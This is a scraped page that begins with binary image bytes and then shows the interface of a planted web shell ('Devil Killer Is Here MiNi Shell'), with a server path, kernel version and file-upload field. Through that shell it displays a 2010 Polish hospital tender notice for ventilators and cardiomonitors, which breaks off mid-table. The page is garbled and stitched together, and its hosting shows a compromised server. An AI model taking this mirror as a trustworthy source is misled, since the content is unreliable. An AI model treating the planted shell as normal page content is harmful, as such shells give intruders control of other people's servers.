JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20100715/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20100715/188397-N-2010.html

<p class="kh_header"><b>Choszczno: DOSTAWA KARDIOMONITORÓW I RESPIRATORÓW
DLA
 SP ZOZ W CHOSZCZNIE</b><br>
<b>Numer ogłoszenia: 188397 - 2010; data zamieszczenia: 15.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej , ul. Niedziałkowskiego 4a, 73-200 Choszczno, woj. zachodniopomorskie, tel. 095 7652438, 7657211 w 143, faks 095 7652410.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.spzozchoszczno.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA KARDIOMONITORÓW I RESPIRATORÓW
DLA
 SP ZOZ W CHOSZCZNIE.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem  zamówienia jest Przedmiotem zamówienia jest dostawa kardiomonitorów i respiratorów szczegółowo określonych w załączniku nr 2 do specyfikacji istotnych warunków zamówienia umieszczonych na stronie internetowej Zamawiającego wraz z pozostałymi dokumentami przetargowymi. Zamawiający dopuszcza składania ofert częściowych. Zadanie jest podzielone na trzy pakiety. Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 6 do SIWZ. Zamawiający żąda wskazania przez Wykonawcę w ofercie części zamówienia, której wykonanie powierzy podwykonawcom..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.19.51.10-7, 33.17.00.00-2, 44.61.12.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 28.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunków udziału w postępowaniu z art. 22 ust.1 ustawy Pzp, zgodnie z art. 44 ustawy. ( zał. nr 3 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunków udziału w postępowaniu z art. 22 ust.1 ustawy Pzp, zgodnie z art. 44 ustawy. ( zał. nr 3 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunków udziału w postępowaniu z art. 22 ust.1 ustawy Pzp, zgodnie z art. 44 ustawy. ( zał. nr 3 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunków udziału w postępowaniu z art. 22 ust.1 ustawy Pzp, zgodnie z art. 44 ustawy. ( zał. nr 3 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunków udziału w postępowaniu z art. 22 ust.1 ustawy Pzp, zgodnie z art. 44 ustawy. ( zał. nr 3 do SIWZ).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz ofertowy (zał. nr 1 do SIWZ);
Formularz asortymentowo-cenowy (zał. nr 2 do SIWZ);
Zatwierdzony projekt umowy wraz z warunkami gwarancyjnymi (załącznik nr 4 do SIWZ)
Oświadczenie o atestach stanowiące załącznik nr 5 do SIWZ. 
Potwierdzone warunki graniczne zgodnie z załącznikiem nr 6 do SIWZ</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.spzozchoszczno.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej.  73-200 Choszczno  ulica Niedziałkowskiego 4A  Pokój nr 306.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.07.2010 godzina 10:00, miejsce: Samodzielny Publiczny Zakład Opieki Zdrowotnej.  73-200 Choszczno  ulica Niedziałkowskiego 4A  Pokój nr 305 (sekretariat Dyrektora)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> respirator transportowy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	OPIS PRZEDMIOTU ZAMÓWIENIA	PARAMETRY WYMAGANE	PARAMETRY OFEROWANE
1.		Przenośny respirator transportowy z zasilaniem bateryjnym	TAK	
2.		Wyposażony w wbudowany manometr i zastawkę ciśnieniową  bezpieczeństwa regulowaną płynnie w zakresie 20-60 mbar	TAK	
3.		Wentylacja 100% -tlenem i mix tlenowy  	TAK	
4.		Niezależna regulacja objętości minutowej i częstotliwości oddechowej	TAK	
5.		Regulacja objętości oddechowej w zakresie min. 5-20 l/min	TAK	
6.		Regulacja częstotliwości oddechowej 
w zakresie min. 8-40 oddechów/ min.	TAK	
7.		Funkcja inhalacji wbudowana w respirator lub przy zastosowaniu dodatkowego modułu.	TAK	
8.		Zawór  PEEP 	TAK	
9.		 Przewód do  pobierania tlenu z centralnej instalacji  tlenowej karetki ze złączem AGA	TAK	
10.		Alarmy bezpieczeństwa  - optyczne i dźwiękowe :
- wysokiego ciśnienia wentylacji
- niskiego ciśnienia wentylacji/rozłączenia
- niskiego ciśnienia tlenu na przyłączu tlenowym
- rozładowania baterii 	TAK	
11.		Zasilanie bateryjne- czas życia baterii min. 1 rok.	TAK	
12.		Reduktor tlenowy  i butla o pojemności minimum 2 l	TAK	
13.		 Respirator z wszystkimi akcesoriami ( butla, reduktor itp.) przenoszony w zestawie przenośnym umożliwiającym szybkie umocowanie w uchwycie ściennym	TAK	
14.		Mocowanie ścienne dla oferowanego respiratora	TAK	
15.	1	Ciężar respiratora bez butli- podać, maksymalnie 4 kg 	TAK	
16.	2	Czas pracy na akumulatorze - podać, minimum 2 h	TAK.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 44.61.12.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 28.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> respirator stacjonarny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet II  pozycja 1: Respirator stacjonarny z ekranem 12
Producent: 
Urządzenie typ: 
Kraj pochodzenia: 
Rok produkcji: 2010 r.

L. p.	Minimalne wymagane parametry techniczne	Parametry  wymagane	Oferowane parametry techniczne
I	CERTYFIKATY JAKOŚCI		
1.		Deklaracja zgodności i certyfikat CE 
(podać nr certyfikatu)	TAK	
2.		Wpis do rejestru wyrobów medycznych 
(podać nr wpisu)	TAK	
II	WYMAGANIA OGÓLNE		
3.		Respirator stacjonarny oraz do transportu wewnątrzszpitalnego dla dzieci i dorosłych.	TAK	
4.		Zasilanie gazowe w tlen z centralnej instalacji.
minimalny zakres 2,5 do 5 bar
Przewód zasilający do gniazda typu AGA	TAK
	
5.		Zasilanie gazowe w sprężone powietrze z centralnej instalacji. (respirator musi mieć możliwość podłączenia do centralnej instalacji sprężonego powietrza)
minimalny zakres 2,5 do 5 bar
Przewód zasilający do gniazda typu AGA	TAK
	
6.		Respirator na podstawie jezdnej, dwa kółka wyposażone w blokadę. 	TAK	
7.		Awaryjne zasilanie w sprężone powietrze na czas awarii zasilania w sprężone powietrze lub transportu wewnątrzszpitalnego 	TAK
Opisać zastosowane rozwiązania	
8.		Zasilanie AC 230 V 50 Hz +/-5% 	TAK	
9.		Awaryjne zasilanie respiratora z akumulatora wewnętrznego na min. 60 minut (łącznie z awaryjnym zasilaniem w powietrze)	TAK
Podać czas pracy	
III	TRYBY WENTYLACJI		
10.		Wentylacja kontrolowana objętością VCV	TAK		
11.		Wentylacja kontrolowana ciśnieniem PCV	TAK		
12.		Wentylacja kontrolowana ciśnieniem z docelową objętością typu PRVC, AutoFlow, APV, VC+	TAK		
13.		CMV/ Assist	TAK		
14.		SIMV	TAK		
15.		Oddech spontaniczny
wspomagany ciśnieniem
PSV	TAK		
16.		Oddech spontaniczny
wspomagany objętością VSV	TAK		
17.		PEEP/CPAP 	TAK		
18.		Wdech manualny	TAK	
19.		Oddech spontaniczny	TAK	
20.		Westchnienia automatyczne	TAK	
21.		Wentylacja spontaniczna na dwóch poziomach ciśnienia: BIPAP, Bilevel, SPAP i podobne	TAK	
22.		Wentylacja nieinwazyjna	TAK	
23.		Wentylacja bezdechu z
możliwością ustawienia
parametrów oddechowych i
możliwością wyboru rodzaju oddechu wymuszonego - min. VCV lub PCV. 	TAK	
IV	PARAMETRY NASTAWIALNE		
24.		Częstość oddechów 
minimalny zakres 3-100 odd/min	TAK.
	
25.		Objętość pojedynczego oddechu
minimalny zakres 10- 1800 ml 	TAK.
	
26.		Regulowany stosunek  wdechu do wydechu 
minimalny zakres 4:1 - 1:9	TAK.
	
27.		Stężenie tlenu w mieszaninie oddechowej regulowane płynnie w zakresie 21 - 100%	TAK
	
28.		Ciśnienie wdechowe PCV 
minimalny zakres 3 - 70 cmH2O	TAK
	
29.		Ciśnienie wspomagania PSV
minimalny zakres 3 - 70 cmH2O	TAK
	
30.		PEEP/CPAP
minimalny zakres 0 - 30 cmH2O	TAK
	
31.		Przepływowy tryb rozpoznawania oddechu własnego pacjenta 
minimalny zakres 0,5 - 15 l/min	TAK
	
32.		Ciśnieniowy tryb rozpoznawania oddechu własnego pacjenta
minimalny zakres 1 - 15 cmH2O	TAK
	
V	POMIARY I WARTOŚCI  LICZBOWE WYŚWIETLANE NA EKRANIE RESPIRATORA		
33.		Wbudowany kolorowy, dotykowy ekran, przekątna minimum 12 cali	TAK
Opisać, podać przekątną ekranu	
34.		Integralny pomiar stężenia tlenu 	TAK	
35.		Całkowita częstość oddychania	TAK	
36.		Wydechowa objętość pojedynczego oddechu	TAK	
37.		Wydechowa objętość całkowitej wentylacji minutowej 	TAK	
38.		Ciśnienie szczytowe	TAK	
39.		Średnie ciśnienie w układzie oddechowym	TAK	
40.		Stosunek wdech/wydech I:E	TAK	
41.		Ciśnienie PEEP/CPAP	TAK	
42.		Graficzna prezentacja w czasie rzeczywistym krzywych dynamicznych
Ciśnienie/czas
Przepływ/czas
Objętość/czas
Ciśnienie/objętość
Przepływ/objętość	TAK	
VI	ALARMY		
43.		Braku zasilania w energię elektryczną	TAK	
44.		Całkowitej objętości minutowej (wysokiej i niskiej)	TAK	
45.		Niskiej objętości oddechowej pojedynczego oddechu	TAK	
46.		Wysokiego ciśnienia  w układzie pacjenta	TAK	
47.		Niskiego ciśnienia w układzie pacjenta	TAK	
48.		Wysokiej i niskiej częstości oddechowej	TAK	
49.		Bezdechu 	TAK	
50.		Pamięć alarmów z ich opisem	TAK	
VII	INNE POŻĄDANE FUNKCJE I WYPOSAŻENIE		
51.		Zabezpieczenie przed przypadkową zmianą parametrów wentylacji	TAK
Opisać	
52.		Autotest aparatu sprawdzający poprawność działania elementów pomiarowych, szczelność, i podatność układu oddechowego.	TAK	
53.		Kompletny układ oddechowy wielorazowy dla dorosłych z pułapką wodną w ramieniu wydechowym - 2 szt.	TAK	
54.		Ramię podtrzymujące układ oddechowy	TAK	
55.		Komplet akcesoriów niezbędnych do uruchomienia i pracy respiratora	TAK	
56.		Możliwość stosowania układów, filtrów  oddechowych od różnych producentów	TAK	
  VIII	POZOSTAŁE		
57.		Instrukcja obsługi w języku polskim (z dostawą)	TAK	
58.		Oprogramowanie oraz napisy na płycie czołowej w języku polskim 	TAK.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 44.61.12.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 28.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> kardiomonitory.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet III  pozycja 1: Kardiomonitor na salę pooperacyjną sztuk 2.
Producent: 
Urządzenie typ: 
Kraj pochodzenia: 
Rok produkcji: 2010 r.
L. p.	Minimalne wymagane parametry techniczne	Parametry  wymagane	Oferowane parametry techniczne
1.		Monitor kompaktowy o wadze nie większej niż 5 kg z akumulatorami	TAK	
2.		Ekran o przekątnej min. 12, kolorowy, LCD TFT 	TAK	
3.		Monitor przystosowany do pracy w sieci Ethernet bez stacji centralnego nadzoru	TAK	
4.		Ilość kanałów dynamicznych min. 6	TAK	
5.		Rozdzielczość co najmniej 800x600	TAK	
6.		Trendy tabelaryczne i graficzne wszystkich parametrów z min. 48 godz.	TAK	
7.		Zasilanie monitora 230V/50Hz	TAK	
8.		Wewnętrzne zasilanie akumulatorowe na min. 2 godziny pracy	TAK	
9.		Akumulatory wymienialne przez użytkownika bez rozkręcania monitora	TAK	
10.		Instrukcja w języku polskim ( na CD załączona do oferty)	TAK	
11.		Obsługa przy pomocy pokrętła i dedykowanych do podstawowych czynności obsługi przycisków funkcyjnych (nie dopuszcza się ekranu dotykowego)	TAK	
12.		Funkcje ułatwiające ocenę zmian stanu pacjenta: wyświetlanie krótkich odcinków trendów (ostatnie 1 lub 2 godz.) obok odpowiadających im krzywych dynamicznych oraz wyświetlanie oksykardiorespirogramów	TAK	
13.		Programowanie wyświetlania krzywych dynamicznych wraz z wartościami cyfrowymi i ekranu dużych cyfr	TAK	
14.		Możliwość rozbudowania monitora o drukarkę, inwazyjny pomiar ciśnienia i kapnografię	TAK	
Pomiar EKG STRESP
15.		Pomiar częstości pracy serca pacjentów dorosłych w zakresie co najmniej od 15 do 300 Bmin	TAK	
16.		Pomiar odchylenia odcinka ST w wybranym odprowadzeniu w zakresie co najmniej od -2,0 do +2,0 mV	TAK	
17.		Pomiar częstości oddechu pacjentów dorosłych w zakresie co najmniej od 6 do 120 Rmin	TAK	
18.		Nadzór bezdechu - ustawianie czasu bezdechu w zakresie min. od 10 do 40 s	TAK	
19.		Przewód EKG z 5. końcówkami EKG.
Odłączane pojedynczo końcówki - możliwość używania tylko 3. odprowadzeń	TAK	
Pomiar ciśnienia metodą nieinwazyjną
20.		Wyświetlanie wartości ciśnień skurczowego, rozkurczowego i średniego	TAK	
21.		Zakres pomiarowy ciśnienia co najmniej od 10 do 270 mmHg	TAK	
22.		Tryb pracy ręczny 	TAK	
23.		Tryb pracy automatyczny - przedziały czasowe pomiaru co najmniej od 3 do 480 minut	TAK	
24.		Mankiety średni, duży i mały dla dorosłych. Przewód łączący mankiet z monitorem.	TAK	
Pomiar saturacji i pletyzmografia
25.		Wyświetlanie krzywej pletyzmograficznej oraz wartości saturacji i częstości pulsu	TAK	
26.		Dźwięk wykrycia pulsu o zmiennym tonie zależnym od wartości saturacji	TAK	
27.		Czujnik pomiarowy dla dorosłych na palec. Przewód łączący czujnik z monitorem.	TAK	
Pomiar temperatury - 2 kanały
28.		Wyświetlanie wartości temperatury ciała  	TAK	
29.		Czujnik temperatury powierzchniowej, dla dorosłych	TAK	
Dodatkowe wyposażenie 
30.		Uchwyt do montażu monitora na ścianie z możliwością regulacji obrotu i nachylenia, z koszykiem na akcesoria - 2 szt. 
Możliwość zdjęcia monitora  bez użycia narzędzi  	TAK	
31.	Komunikacja z użytkownikiem w języku polskim  	TAK	
Nie spełnianie wyżej wymienionych warunków powoduje odrzucenie oferty.


Pakiet III  pozycja 2: Kardiomonitor na SOR sztuk 2.
Producent: 
Urządzenie typ: 
Kraj pochodzenia: 
Rok produkcji: 2010 r.

L. p.	Minimalne wymagane parametry techniczne	Parametry  wymagane	Oferowane parametry techniczne
1.		Monitor przystosowany do pracy w standardowej sieci Ethernet przewodowej i bezprzewodowej	TAK	
